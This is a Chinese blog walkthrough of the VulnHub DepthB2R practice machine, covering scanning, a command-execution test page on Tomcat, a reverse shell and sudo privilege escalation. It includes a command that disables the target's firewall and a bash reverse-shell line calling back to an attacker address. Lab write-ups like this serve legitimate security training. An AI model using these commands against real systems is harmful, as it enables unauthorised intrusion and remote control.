DepthB2R

最新推荐文章于 2024-08-05 05:38:05 发布
最新推荐文章于 2024-08-05 05:38:05 发布
阅读量215 收藏
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140894837
版权

一、信息收集

1、主机发现

启动后在页面会显示ip地址

2、端口扫描

nmap 192.168.236.157 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.157:8080

二、漏洞探测

步骤一:访问8080端口,发现是Tomcat主页

步骤二:拼接访问扫描出来的 /test.jsp 文件,得到一个输入框

步骤三:根据提示信息,输入 ls -l /tmp ,可以执行

步骤四:输入 ls -l /home ,发现 bill 用户

步骤五:输入 ps -aux 查看进程,发现 sshd 服务正在使用中,nmap刚刚没有扫描出 ssh 的端口,可能被防火墙限制

三、GetShell

尝试关闭防火墙,反弹shell,同时本地开启监听

ssh bill@localhost sudo ufw disable
ssh bill@localhost bash -i >& /dev/tcp/192.168.236.137/4444 0>&1

四、提权

步骤一:sudo -l

步骤二:直接 sudo su ,成功提权

步骤三:找找flag

花椒椒椒
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 364
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
DepthB2R靶机
zdd1453691081的博客
08-04 185
【代码】DepthB2R靶机。
DepthB2R靶机复现
weixin_52956666的博客
08-02 174
访问192.168.112.149:8080。靶机IP为192.168.112.149。输入ls -l /home查看用户。发现失败,感觉像是ssh服务被关闭。这个靶机比较友好,不需要进行设置。输入ls -l发现存在命令执行。sudo -l查看免密操作。拼接/test.jsp。尝试进行反弹shell。sudo su直接提权。在kali上开启监听。
vulnhub系列:DepthB2R
jq_j37的博客
08-03 167
vulnhub系列:DepthB2R靶机,打靶文章
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 121
【代码】DepthB2R靶机渗透测试。
DepthB2R【附代码】(权限提升)
最新发布
weixin_52487093的博客
08-05 55
BREACH: 2.1【附代码】(权限提升)
DepthB2R.ova
2301_77565393的博客
07-26 81
发现test.jsp 打开看看,是一个debug页面,提示输入ls -l /tmp。ps aux查看进程发现竟然有ssh,但是为什么nmap没有扫描到呢?ls -l /home 发现bill用户。查看/etc目录,果然有防火墙,ufw。尝试反弹shell 同时本地开启监听。
vulnhub depth漏洞复现超详细 呦呦呦
2301_76467680的博客
07-26 164
ps aux发现ssh猜测有防火墙。然后输入ls -l/tmp。反弹shell同时开启监听。查看/etc果然有防火墙。
【vulnhub靶场】Depth:1靶机提权
qq_46421742的博客
07-28 190
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
AXA2R allegro封装
05-06
AXA2R Allegro封装是Panasonic公司推出的一款专门针对SD卡贴片接插件的电子设计自动化(EDA)软件工具。在电子硬件设计中,封装是至关重要的一个环节,它涉及芯片与电路板之间的物理连接,以及信号传输的可靠性。AXA...
i2r
02-22
i2r 创建包: cd ~/catkin_ws/srccatkin_create_pkg urdf_robot rospy将文件夹urdf_robot放在这里。 然后编译它: cd ~/catkin_wscatkin_makesource devel/setup.bash推出: roslaunch urdf_robot urdf.launch
Road2R
03-18
"Road2R"项目似乎是一个基于JavaScript的开发项目,但没有提供足够的具体信息来深入讨论。不过,我们可以根据“Road2R”这个标题以及“JavaScript”这个标签来探索JavaScript在IT行业中的一些关键知识点。 ...
lv2r
04-01
"lv2r"看起来像是一个项目或库的名称,很可能与JavaScript编程有关。在JavaScript社区中,这样的命名可能表示“Level 2 Runner”或者某种升级版本。然而,由于提供的信息非常有限,没有具体的代码或详细描述,我们...
简介2R
03-04
Bookdown变压器模板这是基于R Markdown和bookdown ( )的书籍的最小示例。... 您可以通过调用bookdown::render_book('index.Rmd', 'bookdown::pdf_book')生成bookdown::pdf_book格式的图书副本。 更详细的说明可在。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
某大型制造企业IT蓝图规划及实施路线.pptx
08-03
某大型制造企业IT蓝图规划及实施路线.pptx
基于Springboot和Vue的社区团购系统设计源码 社区团购系统设计代码(98分期末优秀大作业)
08-03
社区团购系统设计源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值